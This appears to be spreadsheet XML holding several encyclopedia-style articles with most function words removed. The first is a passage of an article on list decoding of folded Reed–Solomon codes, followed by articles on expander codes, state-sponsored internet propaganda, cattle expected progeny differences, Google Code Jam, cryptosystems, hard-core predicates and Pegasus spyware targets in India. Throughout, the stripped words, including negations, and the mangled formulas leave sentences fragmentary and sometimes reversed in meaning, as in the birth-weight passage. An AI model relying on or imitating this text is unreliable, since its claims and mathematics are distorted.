f\in \mathbb _{q}[x]} degree less {\displaystyle whose encoding differs {\displaystyle fraction {\displaystyle {\frac {s}{s+1}}\left(1-{\frac {mr}{m-s+1}}\right)} {\displaystyle codeword positions.when {\displaystyle s=m=1} notice reduces unique decoding algorithm fraction {\displaystyle (1-r)/2} errors. words, treat unique decoding algorithm specialty list decoding algorithm. quantity {\displaystyle n^{o(1/\varepsilon parameter choices achieve list decoding radius {\displaystyle 1-r-\varepsilon theorem tells exactly large error radius would finally solution subspace. however, still problem standing. list size worst case {\displaystyle n^{\omega (1/\varepsilon actual list close-by codewords small within subspace. need process prune subspace narrow down. this prune process takes {\displaystyle q^{s}} time worst case. unfortunately known improve running time know improve bound list size folded reed-solomon code. things better change code carefully choosing subset possible degree {\displaystyle k-1} polynomials messages, list size shows much smaller losing little rate. talk briefly next step. step prune step converting problem decoding folded reed–solomon code linear systems, linear system used interpolation step another linear system find candidate solution subspace, complexity decoding problem successfully reduced quadratic. however, worst case, bound list size output pretty bad. mentioned step carefully chooses subset possible degree {\displaystyle k-1} polynomials messages, list size much reduced. here expand discussion. achieve goal, idea limit coefficient vector {\displaystyle (f_{0},f_{1},\ldots ,f_{k-1})} special subset {\displaystyle \subseteq \mathbb _{q}^{k}} satisfies conditions: condition {\displaystyle must large enough {\displaystyle |\nu |\geq q^{(1-\varepsilon )k}} ).this make sure rate reduced factor {\displaystyle (1-\varepsilon condition {\displaystyle intersection subspace {\displaystyle dimension {\displaystyle satisfying {\displaystyle s\subset \mathbb _{q}^{k}} {\displaystyle |s\cap |\leqslant such subset called subspace-evasive subset.the bound list size worst case {\displaystyle n^{\omega (1/\varepsilon reduced relative small bound {\displaystyle o(1/\varepsilon ^{2})} using subspace-evasive subsets. during step, check element solution subspace step takes {\displaystyle q^{s}} time worst case {\displaystyle dimension solution subspace). dvir lovett improved result based work guruswami, reduce list size constant. here presented idea used prune solution subspace. details prune process, please refer papers guruswami, dvir lovett, listed reference. summary consider step algorithm quadratic time. summary algorithm listed below. also reed–solomon error correction singleton bound coding theory list decoding references atri rudra's lecture notes: folded reed–solomon codes atri rudra's lecture notes: bounds paper atri rudra venkatesan guruswami: decoding folded reed–solomon codes chapter list decoding folded reed–solomon codes: list decoding folded reed–solomon codes venkatesan guruswami's lecture notes: elementary bounds codes venkatesan guruswami's lecture notes: list decoding folded reed–solomon code guruswami, venkatesan (2011). "linear-algebraic list decoding folded reed–solomon codes". 2011 ieee 26th annual conference computational complexity: 77–85. arxiv:1106.0436. bibcode:2011arxiv1106.0436g. doi:10.1109/ccc.2011.22. isbn 978-1-4577-0179-5. dvirl, zeev; lovett, shachar (2011). "subspace evasive sets". arxiv:1110.5696 [cs.cc]. thesis kristian brander: interpolation list decoding algebraic codes krachkovsky, (2003). "reed–solomon codes correcting phased error bursts". ieee trans. inf. theory. (11): 2975–2984. doi:10.1109/tit.2003.819333.</t>
  </si>
  <si>
    <t>Expander code</t>
  </si>
  <si>
    <t>coding theory, expander codes form class error-correcting codes constructed bipartite expander graphs. along justesen codes, expander codes particular interest since constant positive rate, constant positive relative distance, constant alphabet size. fact, alphabet contains elements, expander codes belong class binary codes. furthermore, expander codes encoded decoded time proportional block length code. expander codes coding theory, expander code {\displaystyle [n,n-m]_{2}\,} linear block code whose parity check matrix adjacency matrix bipartite expander graph. these codes good relative distance {\displaystyle 2(1-\varepsilon )\gamma {\displaystyle \varepsilon {\displaystyle \gamma properties expander graph defined later), rate {\displaystyle \left(1-{\tfrac {m}{n}}\right)\,} decodability (algorithms running time {\displaystyle o(n)\,} exist). definition {\displaystyle {\displaystyle (c,d)} -regular graph {\displaystyle nodes {\displaystyle \{v_{1},\cdots ,v_{n}\}} called variables, {\displaystyle cn/d} nodes {\displaystyle \{c_{1},\cdots ,c_{cn/d}\}} called constraints. {\displaystyle b(i,j)} function designed that, constraint {\displaystyle c_{i}} variables neighboring {\displaystyle c_{i}} {\displaystyle v_{b(i,1)},\cdots ,v_{b(i,d)}} {\displaystyle {\mathcal {s}}} error-correcting code block length {\displaystyle expander code {\displaystyle {\mathcal {c}}(b,{\mathcal {s}})} code block length {\displaystyle whose codewords words {\displaystyle (x_{1},\cdots ,x_{n})} that, {\displaystyle 1\leq i\leq cn/d} {\displaystyle (x_{b(i,1)},\cdots ,x_{b(i,d)})} codeword {\displaystyle {\mathcal {s}}} shown nontrivial lossless expander graphs exist. moreover, explicitly construct them. rate rate {\displaystyle c\,} dimension divided block length. case, parity check matrix size {\displaystyle m\times n\,} hence {\displaystyle c\,} rate least {\displaystyle (n-m)/n=1-m/n\,} distance suppose {\displaystyle \varepsilon &lt;{\tfrac {1}{2}}\,} then distance {\displaystyle (n,m,d,\gamma ,1-\varepsilon )\,} expander code {\displaystyle c\,} least {\displaystyle 2(1-\varepsilon )\gamma n\,} proof note consider every codeword {\displaystyle c\,} {\displaystyle c\,} subset vertices {\displaystyle s\subset l\,} saying vertex {\displaystyle v_{i}\in s\,} {\displaystyle i\,} index codeword then {\displaystyle c\,} codeword every vertex {\displaystyle v\in r\,} adjacent even number vertices {\displaystyle s\,} order codeword, {\displaystyle cp=0\,} {\displaystyle p\,} parity check matrix. then, vertex {\displaystyle r\,} corresponds column {\displaystyle p\,} matrix multiplication {\displaystyle {\text{gf}}(2)=\{0,1\}\,} gives desired result.) vertex {\displaystyle v\in r\,} adjacent single vertex {\displaystyle s\,} know immediately {\displaystyle c\,} codeword. {\displaystyle n(s)\,} denote neighbors {\displaystyle r\,} {\displaystyle s\,} {\displaystyle u(s)\,} denote neighbors {\displaystyle s\,} unique, i.e., adjacent single vertex {\displaystyle s\,} lemma every {\displaystyle s\subset l\,} size {\displaystyle |s|\leq \gamma n\,} {\displaystyle d|s|\geq |n(s)|\geq |u(s)|\geq d(1-2\varepsilon )|s|\,} proof trivially, {\displaystyle |n(s)|\geq |u(s)|\,} since {\displaystyle v\in u(s)\,} implies {\displaystyle v\in n(s)\,} {\displaystyle |n(s)|\leq d|s|\,} follows since degree every vertex {\displaystyle s\,} {\displaystyle d\,} expansion property graph, must {\displaystyle d(1-\varepsilon )|s|\,} edges distinct vertices. remaining {\displaystyle d\varepsilon |s|\,} edges make {\displaystyle d\varepsilon |s|\,} neighbors unique, {\displaystyle u(s)\geq d(1-\varepsilon )|s|-d\varepsilon |s|=d(1-2\varepsilon )|s|\,} corollary every sufficiently small {\displaystyle s\,} unique neighbor. this follows since {\displaystyle \varepsilon &lt;{\tfrac {1}{2}}\,} lemma every subset {\displaystyle t\subset l\,} {\displaystyle |t|&lt;2(1-\varepsilon )\gamma n\,} unique neighbor. proof lemma proves case {\displaystyle |t|\leq \gamma n\,} suppose {\displaystyle 2(1-\varepsilon )\gamma n&gt;|t|&gt;\gamma n\,} {\displaystyle s\subset t\,} {\displaystyle |s|=\gamma n\,} lemma know {\displaystyle |u(s)|\geq d(1-2\varepsilon )|s|\,} then vertex {\displaystyle v\in u(s)\,} {\displaystyle u(t)\,} {\displaystyle v\notin n(t\setminus s)\,} know {\displaystyle |t\setminus s|\leq 2(1-\varepsilon )\gamma n-\gamma n=(1-2\varepsilon )\gamma n\,} first part lemma know {\displaystyle |n(t\setminus s)|\leq d(1-2\varepsilon )\gamma n\,} since {\displaystyle \varepsilon &lt;{\tfrac {1}{2}}\,} {\displaystyle |u(t)|\geq |u(s)\setminus n(t\setminus s)|\geq |u(s)|-|n(t\setminus s)|&gt;0\,} hence {\displaystyle u(t)\,} empty. corollary note {\displaystyle t\subset l\,} least unique neighbor, i.e. {\displaystyle |u(t)|&gt;0\,} corresponding word {\displaystyle c\,} corresponding {\displaystyle t\,} cannot codeword, multiply zeros vector parity check matrix. previous argument, {\displaystyle c\in c\implies wt(c)\geq 2(1-\varepsilon )\gamma n\,} since {\displaystyle c\,} linear, conclude {\displaystyle c\,} distance least {\displaystyle 2(1-\varepsilon )\gamma n\,} encoding encoding time expander code upper bounded general linear code {\displaystyle o(n^{2})\,} matrix multiplication. result spielman shows encoding possible {\displaystyle o(n)\,} time. decoding decoding expander codes possible {\displaystyle o(n)\,} time {\displaystyle \varepsilon &lt;{\tfrac {1}{4}}\,} using following algorithm. {\displaystyle v_{i}\,} vertex {\displaystyle l\,} corresponds {\displaystyle i\,} index codewords {\displaystyle c\,} {\displaystyle y\in \{0,1\}^{n}\,} received word, position {\displaystyle v(y)=\{v_{i}\mid {\text{the }}i^{\text{th}}{\text{ position }}y{\text{ }}1\}\,} {\displaystyle e(i)\,} even {\displaystyle |\{v\in r\mid v_{i}\in n(v){\text{ }}n(v)\cap v(y){\text{ even}}\}|\,} {\displaystyle o(i)\,} {\displaystyle |\{v\in r\mid v_{i}\in n(v){\text{ }}n(v)\cap v(y){\text{ odd}}\}|\,} then consider greedy algorithm: input: received word {\displaystyle y\,} initialize adjacent number vertices v(y') o(i) e(i) flip entry else fail output: fail, modified codeword {\displaystyle y'\,} proof show first correctness algorithm, examine running time. correctness must show algorithm terminates correct codeword received codeword within half code's distance original codeword. corrupt variables {\displaystyle s\,} {\displaystyle s=|s|\,} unsatisfied (adjacent number vertices) vertices {\displaystyle r\,} {\displaystyle c\,} following lemma prove useful. lemma {\displaystyle 0&lt;s&lt;\gamma n\,} {\displaystyle v_{i}\,} {\displaystyle o(i)&gt;e(i)\,} proof lemma know {\displaystyle u(s)\geq d(1-2\varepsilon )s\,} average vertex least {\displaystyle d(1-2\varepsilon )&gt;d/2\,} unique neighbors (recall unique neighbors unsatisfied hence contribute {\displaystyle o(i)\,} since {\displaystyle \varepsilon &lt;{\tfrac {1}{4}}\,} thus vertex {\displaystyle v_{i}\,} {\displaystyle o(i)&gt;e(i)\,} reached codeword, always vertex flip. next, show number errors never increase beyond {\displaystyle \gamma n\,} lemma start {\displaystyle s&lt;\gamma (1-2\varepsilon )n\,} never reach {\displaystyle s=\gamma n\,} point algorithm. proof when flip vertex {\displaystyle v_{i}\,} {\displaystyle o(i)\,} {\displaystyle e(i)\,} interchanged, since {\displaystyle o(i)&gt;e(i)\,} means number unsatisfied vertices right decreases least flip. since {\displaystyle s&lt;\gamma (1-2\varepsilon )n\,} initial number unsatisfied vertices {\displaystyle d\gamma (1-2\varepsilon )n\,} graph's {\displaystyle d\,} -regularity. reached string {\displaystyle \gamma n\,} errors, lemma would least {\displaystyle d\gamma (1-2\varepsilon )n\,} unique neighbors, means would least {\displaystyle d\gamma (1-2\varepsilon )n\,} unsatisfied vertices, contradiction. lemmas show start {\displaystyle s&lt;\gamma (1-2\varepsilon )n\,} (half distance {\displaystyle c\,} always find vertex {\displaystyle v_{i}\,} flip. each flip reduces number unsatisfied vertices {\displaystyle r\,} least hence algorithm terminates {\displaystyle m\,} steps, terminates codeword, lemma (were codeword, would vertex flip). lemma shows never farther {\displaystyle \gamma n\,} away correct codeword. since code distance {\displaystyle 2(1-\varepsilon )\gamma n&gt;\gamma n\,} (since {\displaystyle \varepsilon &lt;{\tfrac {1}{2}}\,} codeword terminates must correct codeword, since number flips less half distance traveled enough reach codeword). complexity show algorithm achieve linear time decoding. {\displaystyle {\tfrac {n}{m}}\,} constant, {\displaystyle r\,} maximum degree vertex {\displaystyle r\,} note {\displaystyle r\,} also constant known constructions. pre-processing: takes {\displaystyle o(mr)\,} time compute whether vertex {\displaystyle r\,} even number neighbors. pre-processing take {\displaystyle o(dn)=o(dmr)\,} time compute list vertices {\displaystyle v_{i}\,} {\displaystyle l\,} {\displaystyle o(i)&gt;e(i)\,} each iteration: simply remove first list element. update list even vertices {\displaystyle r\,} need update {\displaystyle o(d)\,} entries, inserting removing necessary. update {\displaystyle o(dr)\,} entries list vertices {\displaystyle l\,} even neighbors, inserting removing necessary. thus iteration takes {\displaystyle o(dr)\,} time. argued above, total number iterations {\displaystyle m\,} .this gives total runtime {\displaystyle o(mdr)=o(n)\,} time, {\displaystyle d\,} {\displaystyle r\,} constants. also expander graph low-density parity-check code linear time encoding decoding error-correcting codes abnnr codes notes this article based venkatesan guruswami's course notes. references</t>
  </si>
  <si>
    <t>State-sponsored Internet propaganda</t>
  </si>
  <si>
    <t>state-sponsored internet propaganda internet manipulation propaganda sponsored state. asia-pacific islamic republic afghanistan: former government afghanistan used state-sponsored internet troll army push narrative exaggerate afghan taliban casualties. sometimes information posted army picked uncritical sections afghanistan's media reported without additional confirmation. bahrain: since arab spring subsequent uprising, government bahrain increased political media censorship, well launching propaganda disinformation. 2019, bahrain listed countries widespread internet propaganda misinformation hiring cyber hackers censor news bahraini government. from 2017 conflict qatar emerged, bahrain also participated internet propaganda campaign qatar trying spread sectarian conflicts. china: cent party internet water army terms used describe different types state-sponsored pro-chinese communist party (ccp) internet propaganda disinformation operations. according article south china morning post, supporters 2019–20 hong kong protests remarked number cent trolls", fang kecheng, professor chinese university hong kong researched chinese internet nationalism, stated "the also acutely aware radical nationalists control cause trouble. endorsement specific several organs rather overall strategy." june 2020, twitter deleted 170,000 accounts allegedly linked chinese government disinformation campaign targeted hong kong sought discredit united states. december 2021, twitter removed accounts linked chinese government aimed deny human rights abuses uyghurs xinjiang. india:1. india large influential portion population strong nationalist fervor, thus leads rise propaganda-sponsored trolls. since narendra modi came power, bharatiya janata party known using exclusive troll disinformation repress monitor opponents government. 2019, european news watchdog discovered bogus media outlets countries managed "indian influence network". network fake news websites used target policy makers united states european union pakistan. websites spread propaganda influence public perception pakistan. software application operable mobile phone. allegedly used bharatiya janata party (bjp), political party ruling party india since 2014, infiltrate social media platforms order promote favourable viewpoints target perceived opponents. indonesia: indonesia engaged using state-sponsored troll army spread propaganda independence movement west papua accused promoting pro-incumbent campaign 2019 indonesian presidential election. hand, indonesian president joko widodo accused opposition group using propaganda, especially russia, spread hoaxes administration. iran: islamic republic's troll army, known supportive ayatollah khomeini current government iran, also criticizing attempts april 2019, oxford university computational propaganda project published study iranian-related campaign twitter targeting arab users. computational propaganda team found iranian-related campaign twitter focused masquerading arabic news outlets gain trust arab twitter users. iraq: sectarian nature country, iraqi internet propaganda also ranged different groups. during rise islamic state iraq levant, group managed operate systematic propaganda indoctrination internet confuse iraqi civilians. according human rights activist faisal mutar, iraqi online propaganda full speed even death saddam hussein. israel: critics israel claim israeli state-sponsored internet propaganda include hasbara, hasbara fellowships, act.il, jewish internet defense force. supporters generally frame "hasbara" part fight anti-israeli agitation attempts delegitimize jordan: recent widespread protests regard arab spring increasing propaganda internet censorship jordan, laws passed threatening freedom speech. internet operation state propaganda also seeks weaken independent voices journalists country. 2019, freedom media jordan declined regard growing internet propaganda government. malaysia:1. malaysian government begun systematic campaign online defame shiites accordance recent practicing shia islam malaysia since 2010s. "onion army" (malay: tentera bawang) also appeared certain pro-israeli facebook pages defend malaysian government's action barring israeli participants 2019 world para swimming championships. special affairs department, often abbreviated j-kom current official name community communications department (malay: jabatan komunikasi komuniti), government agency malaysian agency used political propaganda machine barisan nasional (bn) united malays national organisation (umno) administration attack opposition parties political rivals. agency attributed engage state-sponsored anonymous political commentators trolls spreading pro-government propaganda internet, colloquially known "cybertroopers" country. 2022, meta platforms announced removed hundreds facebook instagram accounts directly linked royal malaysia police (rmp), used part troll farm disseminate propaganda manipulate public discourse malaysian police government. meta added actions policy "coordinated inauthentic behaviour". myanmar: tatmadaw burmese government sponsored propaganda internet dismiss atrocities towards minorities like rohingya, shan, kachin karen people. north korea: troll army north korea, known supportive dynasty's rule, anti-south korean, anti-american, pro-north korean regime. they first appeared 2013. pakistan:1. pakistan propaganda mostly aiming favor pakistani narratives censoring reports pakistan. november 2019, security intelligence agencies india claimed identified traced 5,000 pakistan-based social media handles actively spreading fake false propaganda citizenship amendment 2019; according indian agencies using "deep fake videos" protests incite communal violence country. january 2020, pakistan's inter-services public relations (ispr) accused india recruiting teenagers spread propaganda disinformation india regarding protest. pakistan armed forces operated series propaganda campaigns kashmir dispute pakistan india defame india extend pakistan's political claim kashmir. troll army, discovered facebook, also known spreading anti-indian disinformation pakistan. furthermore, pakistan armed forces also operated propaganda order influence pakistani government protect power military's authority country, labelling opposing military influence "anti-state". palestine: palestinian propaganda used fight public relations israel, often targeting saudi arabia, united arab emirates, arab states purported "zionist sympathizers." 2002 report israeli military intelligence linked iran syria financial backing pro-palestinian propaganda. philippines: oxford university released study claiming hired "keyboard trolls" played role president rodrigo duterte's presidential campaign 2016. study said duterte campaign team spent least $200 thousand hired people defend duterte online critics. also added hired "trolls" remain support duterte administration elected. online trolls allegedly used administration silence critics threats violence rape people critical duterte's policies. duterte, admitted paying people support online elections said followers referring staunch supporter, mocha uson runs support group mocha uson blog insists uson offers services free. qatar: qatari propaganda previously line saudi emirati 2017–19 qatar diplomatic crisis, jazeera notable evidence qatari propaganda spreading promotion violence, anti-american view nurturing islamist movements. since 2017, arabiya, saudi-based channel, accused qatari government ongoing media onslaught sponsoring massive propaganda networks politico defame saudis raise support qatar. saudi arabia:1. king's brigade, known supportive saud family monarchy. mission denounce criticisms saud family, praising sharia well lethal actions saudi government. recently, targeted palestinians opposing saudi influence like qatar. december 2019, twitter removed 5,929 accounts violating manipulation policies. company investigated attributed accounts single state-run information operation, originated saudi arabia. singapore:1. ruling party people's action party youth wing young officially reported organized teams work publicly anonymously counter criticism party government cyberspace since 1995. reported straits times, 2007, group consists teams, members parliament people's action party, team strategises campaign team executes strategies. there also pro-party individuals known 'internet brigade' claim affiliated party officially endorsed party, elaborate social media pages 'defend' ruling party online chatters criticize social-political websites critical government members opposition parties. they information party's endorsed candidate personal details events publicly known elected members, often anonymous members, sometimes fake purchased identity, re-posting internet forums social-media published articles info-communications media development authority (imda) frequently engages advertising agencies promote civic campaigns national celebrations traditional media, video-sharing websites social media. some nation-building efforts seen selective choosing historical narratives, often focusing achievements ruling party. syria: owing long history censorship, syria extensive state-sponsored propaganda. since syrian civil began, president bashar al-assad frequently allowed pro-regime sockpuppets disinform conflict favor regime. white helmets, humanitarian organization rescuing syrian civilians conflict zones, major target syrian government's disinformation campaign. thailand: royal thai army coordinating russian anti-americanism, support prayuth government, discredit thailand democratic movement since 2010. turkey: 6,000 paid social media commentators known trolls" mainly spreading pro-erdogan propaganda attack opposing erdogan (2016). june 2020 twitter removed 7,340 accounts engaging "coordinated inauthentic activity" targeted turkish citizens; removal prompted erdogan's administration appear threaten twitter government restrictions. united arab emirates: during 2017–19 qatar diplomatic crisis, emirati government openly allowed funded troll propaganda army dismiss qatari rejection spread anti-qatari propaganda. uzbekistan: order control population, uzbek government established social network spread internet censorship propaganda. even death islam karimov, tashkent remains firm ongoing political censorship social media. vietnam:1. public opinion brigades. 2017, military currently employs least 10,000 members special force, named force counter criticisms government cyberspace hacking dissident anti-government websites installing spyware track visitors. december 2019, facebook removed accounts, groups, pages platform instagram, inauthentic behavior spreading political agenda. these accounts reportedly belonged separate groups georgia vietnam. africa egypt: since taking power, abdel fattah el-sisi accused spreading financing propaganda leaflets support regime's political crackdowns opponents hacking promote support el-sisi. europe belarus: lukashenko government taken step spread disinformation accordance rule and, sometimes, line russian troll propaganda, blaming poland ukraine instigating problems lethal threats activists. disinformation became increasingly intensified following 2020 belarusian protests, trolls russia serbia actively participated spread disinformation igniting fears belarusian population turn protests. bulgaria: internet trolls become problem bulgaria since 2010s, troll armies used various political parties attack threaten other. despite attempts reduce internet trolls since 2014, issue remains unaddressed becomes increasingly intensified 2020 corruption boyko borisov's government. france: facebook alleges december 2020, accounts linked french military posing africans french arabic language websites catering region promote views favor france. accounts promoted claims russian interference election central african republic, expressed supportive views french military involvement region criticized russian military involvement region. these accounts also interacted alleged russian accounts. poland: leading nations democratization efforts post-soviet era, since election andrzej duda presidency 2010s, freedom media poland suffered significant deterioration, state-sponsored internet media aligned conservative movement attacking liberal groups poland, criticizing european leaders politics seen abnormal. 2019, troll farm group aligned conservative movement close polish government discovered wrocław. 2020 polish presidential election, duda government accused spreading propaganda manipulate public enhance authoritarian rule. russia:1. brigades first alleged april 2003 cyberberkut internet research agency, also known "trolls olgino". identified "trolling"/astroturfing company operating numerous sites. united kingdom: "online covert action" missions (like "77th brigade) joint threat research intelligence group, revealed edward snowden february 2014. ukraine: although volodymyr zelenskyy polished image bolster reputation support nationalist groups democratization attempts, accusation spreading fake news emerged since presidency, along open endorsement media censorship, dubious link russia, increasing attack free media staffs. americas mexico: according researchers quoted bbc, government multiple competing political parties used bots. according 2017 paper, government-sponsored "spam-bots" used "target journalists" "spread misinformation". united states: operation earnest voice, officially started 2011. venezuela: bolivarian army trolls, founded 2017, tasked disseminating bolivarian propaganda spreading disinformation. also 2016 united states election interference russia agent influence black propaganda front organization shill sock puppet account vote brigading references external links giles, keir march 2016). "russia's 'new' tools confronting west: continuity innovation moscow's exercise power". chatham house. retrieved 2016-04-05.</t>
  </si>
  <si>
    <t>Expected progeny difference</t>
  </si>
  <si>
    <t>expected progeny differences (epd) evaluation animal’s genetic worth parent. they based animal models combine information known individual relatives create genetic profile animal’s merits. these profiles compared individuals breed. types epds example epds looks like following chart. each letters stands specific measurement accuracy reading percent rank each compared breed average given year. number given amount given average. growth epds growth epds measure amount weight given offspring gain parent's genetics. calving ease predicts level difficulty first time heifers birth. these determined percentage unassisted births particular animal.birth weight measures much breed's average offspring gain parent. necessarily predict exact weight offspring, instead gives general prediction much extra less weight offspring weigh compared sired another bull. high birth weight biggest cause difficulty calving, bull birth weight high beneficial.weaning yearling weight measure amount weight offspring gained time weaned year mark. typically weaning weight measured 205-day mark yearling weight taken 365-day mark. typically larger number favored traits.milk epds give estimate maternal portion weaning weight determined milk production dam. measured pounds weaning weight bull's grandprogeny milk production bull's daughters. reproductive epds scrotal circumference indicator bull's fertility. larger circumference preferred indicator sons larger scrotal circumference daughters reach puberty sooner therefore calves sooner.gestation length indicator probability dystocia. longer calf utero larger birth greater chance dystocia. also gives larger postpartum interval pregnancies. shorter gestation length usually preferred this.stayability indicator longevity bull's daughter herd. higher value greater chance stay herd years continue producing quality offspring. carcass epds carcass weight predicts animal's total retail product compared animals breed. however predict percent retail value, actual amount sellable meat produced carcass.fat thickness determined expected external seam animal contain. these factors contribute greatest waste animal best reduce economic loss. thickness epds help producers reduce loss, using animals range epds, little much fat.marbling epds also important beef industry predicting palatability beef carcass. they show estimated usda quality grading system marbling score animal would receive slaughtered. this different measured units marbling score, weight gained animal. higher values indicate presence genes produce intramuscular fat. accuracy epds used scientific research typical farm usage. through mathematical equations computing power epds generated situations. through epds certain phenotypes chosen others. epss markers help choosing certain traits others. using certain epds animal rapidly improve genetics herd, especially highly heritable traits marbling. addition, using combination epds markers, epds made accurate. when markers used, help adjust according genotype therefore produce accurate measurement.to determine accurate epds individual, samples bull's offspring looked compared expected outcome been. epds changed based values gathered. higher accuracy rate, closer progeny values listed. accuracy indicator beneficial epds, rather shows close true genetic potential animal. closer accuracy value accurate epds thought other factors affect progeny well, genetic effects including feed, weather, environment, well random mendelian sampling. addition accuracy shown chart, often percent rank also given. this shows percentile animal ranks given epd. higher percentile, better characteristic. better epds given bull, higher chance progeny given characteristic. references</t>
  </si>
  <si>
    <t>Google Code Jam</t>
  </si>
  <si>
    <t>google code international programming competition hosted administered google. competition began 2003. competition consists algorithmic problems must solved fixed amount time. competitors programming language development environment obtain solutions. from 2003 2007, google code deployed topcoder's platform. since 2008 google developed dedicated infrastructure contest. between 2015 2018, google also distributed code jam, focus distributed algorithms. this parallel regular code jam, qualification final round, prize $10,000, open people qualified round code 3000 people). several google code problems academic research. past winners google code 2020 code world final originally scheduled take place munich, germany, later converted online format response covid-19 pandemic. distributed code results country also google code online judge topcoder open references https://code.google.com/codejam/contest/7214486/scoreboard archived december 2015 wayback machine https://code.google.com/codejam/contest/2437491/scoreboard?c=2437491 archived april 2015 wayback machine vance, c.m.; paik, (2015). managing global workforce. taylor francis. isbn 978-1-317-51661-3. retrieved july 2018. foley, s.n.; gollmann, snekkenes, (2017). computer security esorics 2017: 22nd european symposium research computer security, oslo, norway, september 11-15, 2017, proceedings. lecture notes computer science. springer international publishing. 291. isbn 978-3-319-66399-9. retrieved august 2018. external links google code</t>
  </si>
  <si>
    <t>List of cryptosystems</t>
  </si>
  <si>
    <t>cryptosystem cryptographic algorithms ciphertexts plaintexts other. private-key cryptosystems private-key cryptosystems encryption decryption. caesar cipher substitution cipher enigma machine data encryption standard twofish serpent camellia salsa20 chacha20 blowfish cast5 kuznyechik 3des skipjack safer idea advanced encryption standard, also known rijndael. public-key cryptosystems public-key cryptosystems public encryption private decryption. diffie–hellman exchange encryption rabin cryptosystem schnorr signature elgamal encryption elliptic-curve cryptography lattice-based cryptography mceliece cryptosystem multivariate cryptography isogeny-based cryptography references</t>
  </si>
  <si>
    <t>Hard-core predicate</t>
  </si>
  <si>
    <t>cryptography, hard-core predicate one-way function predicate (i.e., function whose output single bit) easy compute function hard compute given f(x). formal terms, probabilistic polynomial-time (ppt) algorithm computes b(x) f(x) probability significantly greater half random choice words, drawn uniformly random, given f(x), adversary distinguish hard-core b(x) uniformly random negligible advantage length hard-core function defined similarly. that chosen uniformly random, given f(x), algorithm distinguish hard-core function value h(x) uniformly random bits length |h(x)| negligible advantage length hard-core predicate captures concentrated sense" hardness inverting while one-way function hard invert, guarantees feasibility computing partial information preimage image f(x). instance, conjectured one-way function, jacobi symbol preimage easily computed image.: clear one-to-one function hard-core predicate, must way. oded goldreich leonid levin (1989) showed every one-way function trivially modified obtain one-way function specific hard-core predicate. one-way function. define g(x,r) (f(x), length denote then {\displaystyle b(x,r):=\langle x,r\rangle =\bigoplus _{j}x_{j}r_{j}} hard core predicate note b(x, denotes standard inner product vector space (z2)n. this predicate hard-core computational issues; hard compute g(x, information theoretically lossy. rather, exists algorithm computes predicate efficiently, another algorithm invert efficiently. similar construction yields hard-core function o(log |x|) output bits. suppose strong one-way function. define g(x, (f(x), 2|x|. choose length function l(n) o(log s.t. l(n) {\displaystyle b_{i}(x,r)=\bigoplus _{j}x_{j}r_{i+j}.} then h(x, b1(x, b2(x, bl(|x|)(x, hard-core function output length l(|x|).it sometimes case actual input hard-core. example, every single inputs function hard-core predicate blocks o(log |x|) bits indistinguishable random strings polynomial time (under assumption function hard invert).hard-core predicates give construct pseudorandom generator one-way permutation. hard-core predicate one-way permutation random seed, {\displaystyle \{b(f^{n}(s))\}_{n}} pseudorandom sequence, means n-th iteration applying generated hard-core round hard-core predicates trapdoor one-way permutations (known trapdoor predicates) used construct semantically secure public-key encryption schemes.: also list-decoding (describes list decoding; core goldreich-levin construction hard-core predicates one-way functions viewed algorithm list-decoding hadamard code). references oded goldreich, foundations cryptography basic tools, cambridge university press, 2001.</t>
  </si>
  <si>
    <t>Pegasus Project revelations in India</t>
  </si>
  <si>
    <t>india, pegasus project investigations alleged pegasus spyware used ministers, opposition leaders, political strategist tacticians, journalists, activists, minority leaders, supreme court judges, religious leaders, administrators like election commissioners heads central bureau investigation (cbi). some phones later analysed confirmed targeted pegasus spyware.the pegasus project collaborative investigative journalism initiative undertaken media organisations. pegasus spyware developed group, israeli technology cyber-arms firm secretly deployed mobile phones devices, versions android ios. pegasus capable reading text messages, tracking calls, collecting passwords, location tracking, accessing target device's microphone camera, harvesting information apps. since pegasus classified cyber-arms israeli government, national governments purchase spyware authorisation israeli government. pegasus project initiative investigated pegasus spyware governments journalists, opposition politicians, activists business people. target list consisting 50,000 phone numbers, could possibly targeted spyware, leaked forbidden stories spawned investigation. numbers india. presence phone number list confirm pegasus forensic examination phone confirm spyware present. supreme court appointed technical committee asked submit phones investigation individuals suspect snooping government. list targets following list alleged indian targets revealed pegasus project investigations: rahul gandhi, indian politician main rival indian prime minister narendra modi, targeted cellphones. would claim "all [his] phones tapped".five close friends indian national congress party officials leaked list potential targets. prashant kishor, political strategist tactician, linked several prime minister narendra modi's rivals, also targeted. presence spyware phone later confirmed. ashok lavasa, ex-election commissioner india flagged prime minister narendra modi's poll code violation 2019 indian general election targeted. alok verma, ousted head central bureau investigation (cbi) prime minister narendra modi 2018 target. numerous indian politicians including deputy chief minister karnataka parameshwara, well close aides chief minister kumaraswamy senior congress leader siddaramaiah. abhishek banerjee, west bengal politician aitc, nephew incumbent chief minister west bengal mamata banerjee. siddharth varadarajan, delhi–based, american investigative journalist founder wire. varadarajan joined investigation project pegasus. umar khalid, left-wing student activist leader democratic students' union, added list late 2018, charged sedition. accused organising riots, charged sedition uapa arrested september 2020. alleged evidence taken phone. currently jail awaiting trial. stan swamy, indian jesuit father activist. swamy died july 2021 contracting covid-19 prison.collaborators hany babu, shoma rona wilson also project's list alleged targets. ashwini vaishnaw, minister electronics information technology assumed office less weeks investigation revealed. inner circle 14th dalai lama tenzin gyatso, 17th karmapa ogyen trinley dorje tibetan figures, including: tempa tsering, dalai lama's envoy delhi tenzin taklha, dalai lama's senior aide chhimey rigzen, dalai lama's senior aide lobsang tenzin, samdhong rinpoche, responsible selection dalai lama's successor lobsang sangay, former president tibetan government-in-exile penpa tsering, president tibetan government-in-exile phone numbers associated female employee supreme court india immediate family, accused former chief justice india, ranjan gogoi, sexual harassment, also allegedly found database indicating possibility phones snooped. jain, personal assistant aide arvind kejriwal reactions judiciary campaign judicial accountability reforms (cjar) released following statement:such large-scale intrusive surveillance personal phones political leaders, journalists, activists flagrant violation right privacy upheld hon'ble supreme court affront civil liberties citizens.cjar stated attack independence judiciary called response highest court land. also stated snooping patently illegal. cjar stated allegations hacking sitting supreme court judge ex-cji ranjan gogoi's staffer, accused gogoi sexual harassment, family members "grave seriousness". raised question asking software reported sold "vetted governments" national security issues used gogoi's staffer also demanded probe improper collusion executive judiciary. press release, stated:the victimisation woman police, many questionably judicial orders passed benches headed justice gogoi favourable union government, justice gogoi's nomination rajya sabha soon retirement raises serious questions collusionit recommended special investigation team headed retired supreme court judge investigate pegasus snooping scandal probe improper collusion union government former chief justice india. journalists tweet, press club india (pci) issued statement:this first time history country pillars democracy judiciary, parliamentarians, media, executives ministers spied 